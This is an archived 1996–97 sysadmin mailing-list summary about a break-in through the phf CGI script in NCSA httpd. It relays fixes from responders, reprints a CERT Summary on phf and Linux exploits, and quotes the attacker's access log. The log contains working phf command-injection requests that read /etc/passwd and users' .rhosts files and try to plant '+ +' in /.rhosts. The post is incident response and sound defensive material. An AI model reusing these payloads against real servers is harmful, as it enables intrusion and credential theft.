Dear Gurus,
Thanks to the following people who sent suggestions:
Jeff Thomas <jeff_at_WebNexus.COM>
Craig I. Hagan <hagan_at_cih.com>
Johan Mertensson <jom_at_s3.kth.se>
Gyula Szokoly <szgyula_at_arrakis.pha.jhu.edu>
Phil Edwards <pedwards_at_valhalla.cs.wright.edu>
Phil Farrell <farrell_at_pangea.Stanford.EDU>
Pat Wilson paw_at_dartmouth.edu
Steven E. Newton <snewton_at_oac.hsc.uth.tmc.edu>
Jimmy M. Ferng, ferng_at_Arizona.EDU
Juan Gallego <Little.Boss_at_physics.mcgill.ca>
Jon Mitchiner <mitchinj_at_vrinet.com>
Carlos A M dos Santos <casantos_at_cpmet.ufpel.tche.br>
Michael Jastremski mjastrem_at_thunder.temple.edu
Antonio S. Martins Jr. <shadow_at_wnet.com.br>
Max M. Ramsay <mramsay_at_chakotay.au.af.mil>
Steve VanDevender <stevev_at_hexadeSteve
Pantelis Topalis <topalis_at_konops.imbb.forth.gr>
Steve Gibbons <steve_at_wyrm.AZTech.Net>
Lance A. Brown <labrown_at_splat.niehs.nih.gov>
pobrien_at_draco.harvard.edu (Patrick O'Brien)
joe.wilson_at_digitalink.com
Jon Reeves <reeves_at_zk3.dec.com>
Santosh Krishnan x2815 <santosh_at_heplinux1.uta.edu>
Carlos Medina <cmedina_at_venus.javeriana.edu.co>
Tim Mooney <mooney_at_dogbert.cc.ndsu.NoDak.edu>
Paula <paulaw_at_ozemail.com.au>
John P. Speno <speno_at_swarthmore.edu>
David Krinsky <krinsky_at_hcs.harvard.edu>
Ray Bellis <Ray.Bellis_at_community.co.uk>
Jean-Loup.Risler_at_genetique.uvsq.fr (Jean-Loup Risler)
Bob.Fedick_at_smed.com
PETER MILNES <p_milnes_at_BANKS.NTU.EDU.AU>
Lucio Chiappetti <lucio_at_ifctr.mi.cnr.it>
J.Rawcliffe_at_ee.surrey.ac.uk
Martin J. Laubach <mjl_at_CSlab.tuwien.ac.at>
William H. Magill <magill_at_isc.upenn.edu>
John Sheehy <jes_at_grove.ufl.EDU>
Roddy McColl <roddy_at_visual-ra.swmed.edu>
The problem I posted to the list concerns to a security hole
in our http daemon (NCSA, version 1.5a). See copy of the original
message below.
Most all people suggested to get rid of /cgi-bin/phf script
which in this version allow anybody to run commands in our
machine (including getting our /etc/passwd, although this is not too
serious since we have C2 security). That script is useless and
serves only to create the problem. There is also the suggestion
to run httpd as nobody or uucp, and not as root (as we have here).
That security hole was noticed by the CERT people and a Summary
was published by them last November. I am enclosing to this
message their publication which was sent to me by some of the above
kind gurus.
We have reinstalled the operating system just to be sure
we would not keep any important file that could have been edited
by the hacker.
Pantelis Topalis sent me a perl script that creates a fake phf
that is "... used to try to find out as much info from the person
calling the script as possible". I can send a copy to interested
people or just get it from
#
http://www.eng.auburn.edu/users/rayh/software/phf.html
#
ftp://ftp.eng.auburn.edu/pub/rayh/security/phf
******** CERT Summary *****************
CERT(sm) Summary CS-96.6
November 26, 1996
The CERT Coordination Center periodically issues the CERT Summary to
draw attention to the types of attacks currently being reported to our
Incident Response Team. The summary includes pointers to sources of
information for dealing with the problems. We also list new or updated
files that are available for anonymous FTP from
ftp://info.cert.org/pub/
Past CERT Summaries are available from
ftp://info.cert.org/pub/cert_summaries/
- ----------------------------------------------------------------------------
Recent Activity
- ---------------
Since the September CERT Summary, we have noticed these continuing trends
in incidents reported to us.
1. cgi-bin/phf Exploits
We continue to see frequent reports of attempts to exploit the vulnerability
in the CGI example program "phf". The phf program, which is installed by
default with several implementations of httpd servers, contains a weakness
that can allow intruders to execute arbitrary commands on the server. The
most common attack involves an attempt to retrieve the httpd server's
/etc/passwd file, and sample scripts for exploiting this vulnerability in phf
have been widely posted on the Internet.
While we are encouraged to see that the majority of the recently reported
attacks have failed (because the attacked sites had already removed the phf
program), the steady reports of continuing attacks indicate that these phf
exploits are still being widely attempted.
For more information about this vulnerability, see
ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code
For related information about protecting your password files, please see
ftp://info.cert.org/pub/tech_tips/passwd_file_protection
2. Continuing Linux Exploits
We continue to see incidents in which Linux machines have been the victims
of root compromises. In many of these incidents, the compromised systems
were unpatched or misconfigured, and the intruders exploited well-known
vulnerabilities for which CERT advisories have been published.
If you are running Linux, we strongly urge you to keep current with all
security patches and workarounds. If your system has been root compromised,
we also recommend that you review
ftp://info.cert.org/pub/tech_tips/root_compromise
Further, you may want to monitor the Linux newsgroups and mailing lists for
security patches and workarounds. More information can be found at
http://bach.cis.temple.edu/linux/linux-security/
- ----------------------------------
What's New in the CERT FTP Archive
- ----------------------------------
We have made the following changes since the last CERT Summary (September 24,
1996).
* New Additions
ftp://info.cert.org/pub/cert_advisories/
CA-96.22.bash_vuls Addresses two problems with the GNU
Project's Bourne Again SHell (bash):
one in yy_string_get() and one in
yy_readline_get().
CA-96.23.workman_vul Describes a vulnerability in the
WorkMan compact disc-playing program
that affects UNIX System V Release 4.0
and derivatives and Linux systems.
CA-96.24.sendmail.daemon.mode Addresses a vulnerability that allows
intruders to gain root
privileges. Includes patch and upgrade
information.
ftp://info.cert.org/pub/cert_bulletins/
VB-96.17.linux Linux Security FAQ Update from
Alexander Yuriev. Includes information
about a mount/umount vulnerability.
VB-96.18.sun Addresses vulnerabilities in the libc
and libnsl libraries of Solaris 2.5
(SunOS 5.5) and Solaris 2.5.1
(SunOS 5.5.1) from Sun Microsystems,
Inc. Includes patch information.
ftp://info.cert.org/pub/latest_sw_versions/
bash Added information on bash 1.14.7.
sendmail Added information on sendmail 8.8.3.
* Updated Files
ftp://info.cert.org/pub/
Sysadmin_Tutorial.announcement Added date of next course offering.
ftp://info.cert.org/pub/cert_advisories/
CA-94:01.ongoing.network.monitoring.attacks
Clarified introductory
information. Added a pointer to the
CERT tech tip on root compromises.
CA-95:02.binmail.vulnerabilities Removed Appendices B & C, which
contained outdated information. In
section B, added information that
mail.local is now part of
sendmail. Added a pointer to sendmail.
CA-96.09.rpc.statd Updated information from Silicon
Graphics Inc.
CA-96.20.sendmail_vul Added a pointer to CA-96.24.
CA-96.21.tcp_syn_flooding Revised second paragraph of
introduction for clarity. Added new
information for Silicon Graphics
Inc. (SGI), Berkeley Software Design,
Inc. (BSDI), Sun Microsystems, Inc.
Revised appendix information on
reserved private network
numbers. Added pointer to information
in
ftp://info.cert.org/pub/vendors.
CA-96.22.bash_vuls Added Appendix A containing
information from IBM Corporation,
LINUX, and Silicon Graphics,
Inc. (SGI). Removed patch for problem
in yy_readline_get, as the problem
described for yy_string_get is not
exploitable for yy_readline_get.
ftp://info.cert.org/pub/tools/mail.local/
README Added information that mail.local is
now a part of sendmail. Added a
pointer to sendmail.
ftp://info.cert.org/pub/tools/sendmail/
sendmail.8.8.3.patch
sendmail.8.8.3.tar.Z
sendmail.8.8.3.tar.gz
sendmail.8.8.3.tar.sig
ftp://info.cert.org/pub/vendors/hp/
HP.contact_info Replaced instructions for subscribing
by email with the new URLs people must
use.
- ---------------------------------------------------------------------------
How to Contact the CERT Coordination Center
Email cert_at_cert.org
Phone +1 412-268-7090 (24-hour hotline)
CERT personnel answer 8:30-5:00 p.m. EST
(GMT-5)/EDT(GMT-4), and are on call for
emergencies during other hours.
Fax +1 412-268-6989
Postal address
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
USA
To be added to our mailing list for CERT advisories and bulletins, send your
email address to
cert-advisory-request_at_cert.org
CERT advisories and bulletins are posted on the USENET news group
comp.security.announce
CERT publications, information about FIRST representatives, and other
security-related information are available for anonymous FTP from
http://www.cert.org/
ftp://info.cert.org/pub/
If you wish to send sensitive incident or vulnerability information to CERT
staff by electronic mail, we strongly advise you to encrypt your message.
We can support a shared DES key or PGP. Contact the CERT staff for more
information.
Location of CERT PGP key
ftp://info.cert.org/pub/CERT_PGP.key
- ---------------------------------------------------------------------------
Copyright 1996 Carnegie Mellon University
This material may be reproduced and distributed without permission provided
it is used for noncommercial purposes and credit is given to the CERT
Coordination Center.
CERT is a service mark of Carnegie Mellon University.
***** ORIGINAL MESSAGE **************
I was examining the access_log file of our httpd web server and found an strange
access to
our file system, apparently from a web browser in the address xxx.xxx.xxx.xxx.
It looks
like as a hacker sniffing our system. Does anybody have an idea on how this
could
have been done and how to prevent it? How can an external internaut run ls, w
and cat
commands? See below the important lines:
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:34:35 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/cat "+ +" >>%20/.rhosts HTTP/1.0" 200 80
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:35:00 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/cat%20"+ +" >>%20/.rhosts HTTP/1.0" 200 84
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:26 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laFR%20/ HTTP/1.0" 200 40935
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:56:34 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20/ HTTP/1.0" 200 492 xxx.xxx.xxx.xxx - -
[18/Dec/1996:22:56:57 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/ HTTP/1.0" 200 3527
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:57:40 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/w HTTP/1.0" 200 220
xxx.xxx.xxx.xxx - - [18/Dec/1996:22:58:31 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/home HTTP/1.0" 200 217
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:00:40 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/users HTTP/1.0" 200 95
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:00:57 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/users HTTP/1.0" 200 95
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:01:01 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/ HTTP/1.0" 200 3527
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:01:14 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users HTTP/1.0" 200 3986
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:02:33 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxx HTTP/1.0" 200 3881
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:03:24 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxx/.rhosts HTTP/1.0" 200 133
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:05:27 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200
1948
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:06:28 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200
3823
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:08:19 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxxxxx/.rhosts HTTP/1.0" 200
128
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:10:54 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/ls%20-laF%20/usr/users/xxxxxxx HTTP/1.0" 200
934
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:11:36 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/usr/bin/cat%20/usr/users/xxxxxxxx/.rhosts HTTP/1.0" 200
443
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:13:48 -0200] "GET /cgi-bin/phf HTTP/1.0" 200
1262
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:14:23 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 9765
(null) - - [18/Dec/1996:23:17:43 -0200] "" 500 -
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:17:49 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/usr/users1 HTTP/1.0" 200 444
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:18:53 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/usr/users1/xxxxxxxx HTTP/1.0" 200 316
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:21:13 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxx HTTP/1.0" 200
57319
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:23:38 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxx/bin HTTP/1.0" 200
232
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:26:52 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/users1/xxxxxxx/xxxxxx HTTP/1.0" 200 7664
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:27:37 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxt/Mail HTTP/1.0" 200
1559
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:28:26 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/ls%20-laFR%20/usr/users1/xxxxxxt/.cshrc HTTP/1.0"
200 194
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:28:37 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/users1/xxxxxxt/.cshrc HTTP/1.0" 200 1654
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:06 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/echo%01 HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:19 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/echo%02 HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:29:59 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/echo%02%03%04%05 HTTP/1.0" 200 85
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:14 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/echo%02%03%04%0b HTTP/1.0" 200 85
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:30 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/echo50c HTTP/1.0" 200 84
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:30:54 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/echo%0c HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:21 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/echo%0d HTTP/1.0" 200 82
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:34 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/ls%0d HTTP/1.0" 200 80
xxx.xxx.xxx.xxx - - [18/Dec/1996:23:31:44 -0200] "GET
/cgi-bin/phf?Qalias=x%0a/bin/ls%20%0d HTTP/1.0" 200 81
Received on Sat Jan 04 1997 - 00:32:41 NZDT